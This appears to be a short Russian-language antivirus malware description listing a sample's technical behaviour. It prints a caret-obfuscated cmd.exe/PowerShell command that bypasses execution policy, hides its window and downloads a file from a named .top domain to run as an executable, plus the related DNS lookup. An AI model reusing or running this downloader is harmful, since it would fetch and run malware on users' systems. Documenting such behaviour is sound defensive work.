Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^ER^SHe^l^l.^EX^E -eXeCUt^I^ON^Pol^Icy^ B^y^p^A^Ss^ -^noprO^file^ ^-winD^OWStYL^E ^H^I^d^d^e^n^ (^NEW^-oB^jeC^t ^sy^St^E^m.N^ET.^WE^bc^lIen^T)^.D^oW^n^Load^F^ilE^('http://www.d...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "POW^ER^SHe^l^l.^EX^E -eXeCUt^I^ON^Pol^Icy^ B^y^p^A^Ss^ -^noprO^file^ ^-winD^OWStYL^E ^H^I^d^d^e^n^ (^NEW^-oB^jeC^t ^sy^St^E^m.N^ET.^WE^bc^lIen^T)^.D^oW^n^Load^F^ilE^('http://www.d...' (со скрытым окном)